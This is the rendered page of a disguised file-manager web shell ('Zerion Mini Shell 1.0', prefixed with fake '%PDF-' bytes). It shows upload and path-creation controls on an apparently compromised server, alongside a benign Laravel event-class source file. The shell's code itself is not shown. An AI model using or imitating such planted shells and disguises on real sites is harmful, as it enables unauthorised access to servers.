%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /www/loslex_o/test/vendor/laravel/framework/src/Illuminate/Foundation/Events/
Upload File :
Create Path :
Current File : /www/loslex_o/test/vendor/laravel/framework/src/Illuminate/Foundation/Events/PublishingStubs.php

<?php

namespace Illuminate\Foundation\Events;

class PublishingStubs
{
    use Dispatchable;

    /**
     * The stubs being published.
     *
     * @var array
     */
    public $stubs = [];

    /**
     * Create a new event instance.
     *
     * @param  array  $stubs
     * @return void
     */
    public function __construct(array $stubs)
    {
        $this->stubs = $stubs;
    }

    /**
     * Add a new stub to be published.
     *
     * @param  string  $path
     * @param  string  $name
     * @return $this
     */
    public function add(string $path, string $name)
    {
        $this->stubs[$path] = $name;

        return $this;
    }
}

Zerion Mini Shell 1.0